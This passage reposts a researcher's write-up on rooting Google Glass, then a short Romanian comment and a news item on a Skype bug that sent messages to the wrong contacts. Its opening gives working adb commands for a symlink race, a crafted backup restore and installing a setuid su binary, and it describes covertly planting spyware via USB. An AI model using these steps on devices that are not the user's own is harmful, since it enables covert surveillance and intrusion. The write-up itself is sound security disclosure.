next step is to set up the race condition. As part of this exploit payload, a folder will be created in the data area for the Glass Logging service in which anyone, even the otherwise-restricted adb shell, will be able to create new files. We will run a command in the adb shell that will attempt to create the symlink, repeating over and over until it succeeds as the folder is created. $ adb shell "while ! ln -s /data/local.prop \ /data/data/com.google.glass.logging/a/file99 \ 2>/dev/null; do :; done" While that is running (so leave that alone and open a new window) we now need to start the restore process of our modified backup payload. We do this using adb restore. This command (which will exit immediately) will cause another dialog to appear on the display of Glass, so make certain you are still wearing your unit: you will need to scroll to and select the "Restore my data" option. $ adb restore exploit.ab After a few seconds, the previous command (the one attempting to place the symlink) should have completed. (As the timing on this is fairly deterministic, we can feel rather confident that it "worked", but if you want to make certain before proceeding, you should verify that /data/local.prop has now been placed on your device. If not, delete /data/data/com.google.glass.logging/a and try again.) Before we proceed, we should restore the backup we had made of the previous contents of the Glass Logging daemon. This not only cleans up any mess we left (such as the 50MB of backed up files that we extracted as part of the restore), but also will put back the previous (potentially important) personal data for this system service. You will again need to approve this from the device. $ adb restore backup.ab At this point you should reboot your Glass. When it comes back up, there may be some errors displayed regarding the Bluetooth system having crashed or otherwise failed: this is because the emulator (which Glass now believes itself to be running inside of) does not support these features. We thereby need to copy our su binary to the device, make it privileged, undo our hack, and reboot. $ adb reboot $ adb shell "mount -o remount,rw /system" $ adb push su /system/xbin $ adb shell "chmod 6755 /system/xbin/su" $ adb shell "rm /data/local.prop" $ adb reboot Now, when your device reboots, you should no longer get any errors. Your adb shell will also now be restricted as it was before, as the device no longer has our modified properties file. However, as we have installed "su" and marked it with the right privileges, you will be able to get root access whenever you need via adb. You can now install more complex su utilities, and have some fun. If you do not own Glass, or were not interested in the technical details of using this exploit, you should continue reading at this point. Should I now go unlock my bootloader? This is up to you; many people would say "sure, that's what it is there for", but my recommendation is actually to avoid unlocking your bootloader unless you are left with no easy alternatives. You certainly do not need to unlock your bootloader right now: you already have root access. You can always unlock the bootloader if you ever decide you need or want to: you don't have to make this decision right now. As mentioned earlier, in the process it is going to delete all of the data on your device, which might be irritating (you will lose your timeline, and have to reconfigure everything). The device also displays its status (locked, unlocked, or on some devices "re-locked"), allowing the manufacturer to easily deny warranty service to your device. Finally, I'm going to argue you will want to re-lock it anyway. The process of re-locking your device is similar to unlocking it: "fastboot oem lock", and the device is immediately "re-locked". On some devices (not the Nexus 4 I tested), this state is separate from "locked", allowing the manufacturer to know it was previously unlocked. With a re-locked bootloader, you can keep running your modified software, but you cannot use fastboot to modify it again without re-unlocking. The reason you would want to do this is that while your device has an unlocked bootloader, you have no way to be confident that your operating system hasn't been modified by someone while outside of your control. This is because anyone can, after booting your bootloader-unlocked Android device into fastboot, boot or flash any custom image they want. It doesn't matter how secure the operating system is: fastboot is accessible. You might think you would notice if someone installed a different version of Android to your device, but the attacker needs only modify your existing software: they can access the device's filesystem and install a slightly modified version of any of the software that you might use. On many Android devices there are security mechanisms to guard your private data, but the system software is left unencrypted and can be modified. Why do you consider that a problem? This means that if you leave your device in someone else's hands, and it has an unlocked bootloader, with just a minute alone they can access anything you have stored on it. While on most Android devices there is a PIN code that protects your personal data (encrypting it, as of Android 4.0), it doesn't take long to programmatically try every possible PIN code (on iOS, the four-digit code takes ten minutes to crack). That said, getting ten minutes alone with your device might be more difficult than getting just a minute. Sadly, they don't actually need all that time: all they need to do is modify your device to automatically upload all of your contacts to a server the next time you pick it up and start using it. They can even leave software that allows them to remotely access it at any time, getting your location or even taking pictures. (One way of looking at this, for readers that have a background in iOS attacks, is that unlocking your bootloader using "fastboot oem unlock" can be thought of as opening up an exploitable bug in your bootrom; the things you can do to a device that has had its bootloader unlocked are comparable to the things you can do to an iOS device susceptible to the limera1n bootrom exploit, such as an iPhone 4.) The way you are normally protected from this is that, in order to use fastboot to steal your data, the bootloader must be unlocked, and the process of unlocking the bootloader deletes all of your data. (So, if you were wondering earlier why that feature requires you to delete all of your data, this is why: it is to protect you from malicious people unlocking your device, booting a custom image, and brute-forcing your PIN.) The result is that when you get your device back (which might be as simple as returning from the bathroom after leaving it on the table at dinner), it will be painfully obvious it has been modified: all your data will be gone, and when you boot the device it will show the "unlock of shame". It kind of sucks that it is so easy for someone to so easily delete your data and void your warranty over USB, but at least you noticed. OK, and if I don't do that, I'm safe? Sadly, due to the way Glass is currently designed, it is particularly susceptible to the kinds of security issues that tend to plague Android devices. The one saving grace of Android's track record on security is that most of the bugs people find in it cannot be exploited while the device is PIN-code locked. Google's Glass, however, does not have any kind of PIN mechanism: when you turn it on, it is immediately usable. Even if you wear Glass constantly, you are unlikely to either sleep or shower while wearing it; most people, of course, probably will not wear it constantly: it is likely to be left alone for long periods of time. If you leave it somewhere where someone else can get it, it is easy to put the device into Debug Mode using the Settings panel and then use adb access to launch into a security exploit to get root. The person doing this does not even need to be left alone with the device: it would not be difficult to use another Android device in your pocket to launch the attack (rather than a full computer). A USB "On-The-Go" cable could connect from your pocket under your shirt to your right sleeve. With only some momentary sleight-of-hand, one could "try on" your Glass, and install malicious software in the process. You might think that security exploits are rare, but most versions of Android have been subject to these kinds of attacks; again, these are often seen to be somewhat low-priority because most require the device's PIN code to be entered (manually by hand, not via computer, so cracking the code is not an option). In fact, as we have seen, Glass even managed to ship with a security bug in it that was known eight months ago. What can someone do via my Glass? Once the attacker has root on your Glass, they have much more power than if they had access to your phone or even your computer: they have control over a camera and a microphone that are attached to your head. A bugged Glass doesn't just watch your every move: it watches everything you are looking at (intentionally or furtively) and hears everything you do. The only thing it doesn't know are your thoughts. The obvious problem, of course, is that you might be using it in fairly private situations. Yesterday, Robert Scoble demonstrated on his Google+ feed that it survived being in the shower with him. Thankfully (for him, and possibly for us), this extreme dedication to around-the-clock usage of Glass also protects him from malicious attacks: good luck getting even a minute alone with his hardware ;P. However, a more subtle issue is that, in a way, it also hacks into every device you interact with. It knows all your passwords, for example, as it can watch you type them. It even manages to monitor your usage of otherwise safe, old-fashioned technology: it watches you enter door codes, it takes pictures of your keys, and it records what you write using a pen and paper. Nothing is safe once your Glass has been hacked. What should Google do about this? For starters, they should have some kind of protection on your Glass that activates when you take it off. If the detector along the inside of the device is a camera (I am not certain whether it is a camera or a light sensor), it might be possible to use some kind of eye-based biometric. Another option is a voiceprint. Otherwise, a simple PIN code would suffice: the user could enter it using the touchpad when they put it on. Secondly, they should provide some way for the user to feel confident in a given situation that the device could not possibly be recording: a really great suggestion that a friend of mine had is that the camera could have a little sliding plastic shield. (This also addresses the privacy concerns many have about a future where large numbers of people have Glass: this makes it clear "I'm not recording right now".) Finally, they should be a little more careful while discussing these issues with the community. In response to one of the articles written about my post, a Google engineer (who claims to have not read the article and was making a "joke" based only on the title) stated "This is not rooting. Nothing is rooted. There is no root here! This is 'fastboot oem unlock'.", which accidentally derailed the conversation. As an example, in an article published by Ars Technica, the situation had gotten so confused by such statements from Google employees (which included comments like "Yes, Glass is hackable. Duh.") that Ars ended up reporting that "there's been some debate over whether developers actually gained root access to the devices or simply took advantage of a 'fastboot OEM unlock' that Google itself provided". As long as engineers, advocates, and officers from Google make statements like these without carefully looking into the facts first, it will not be possible to have any kind of reasonable and informed discussion about this system. The doors that Google is attempting to open with Glass are simply too large, and the effects too wide-reaching, for these kinds of off-the-cuff statements to be allowed to dominate the discussion. Source: Exploiting a Bug in Google's Glass - Jay Freeman (saurik) Pareri personale: Sa va mai zic ca cei de la Google mai au cateva probleme de rezolvat la acesti ochelari si vor sa dea drumu la productia in masa? Incepem usor usor cumva sa ne "robotizam" si sa fim oarecum monitorizati ? Cam mult cu facebook zic unii, dar cu asta ce vor mai zice ?
  13. Skype privacy bug that can Send Messages To The Wrong Contacts Posted On 7/18/2012 01:02:00 AM By THN Security Analyst What if when you sent a message to someone, it had a very good chance of going to someone else in your contact list? That would be pretty scary right? That what some Skype users are reporting. The bug was first discussed in Skype’s user forums, and seems to have followed a June 2012 update of the Skype software. Skype has confirmed the bug existence and that a fix is in the works. However, the company characterizes the bug as “rare.” Purchased by Microsoft last year for $8.5 billion, the Luxemburg company which has as many as 40 million people using its service at a time during peak periods, explained that messages sent between two users were in limited cases being copied to a third party, but did not elaborate further on the matter. Five other individuals of the Microsoft-owned program confirmed they were also seeing instant messages being sent to the wrong person from their contact list. Sometimes it's just a few messages, while other times it's a whole conversation. Skype has, on its blog, confirmed the issue of a bug sending instant messages to wrong contacts and has promised a fix. Addressing the issue, Skype wrote, "Based on recent Skype customer forum posts and our own investigation over the past couple of days, we have identified a bug that we are working hard to fix." Skype privacy bug that can Send Messages To The Wrong Contacts : The Hacker News ~ http://thehackernews.com/2012/07/skype-privacy-bug-that-can-send.html
×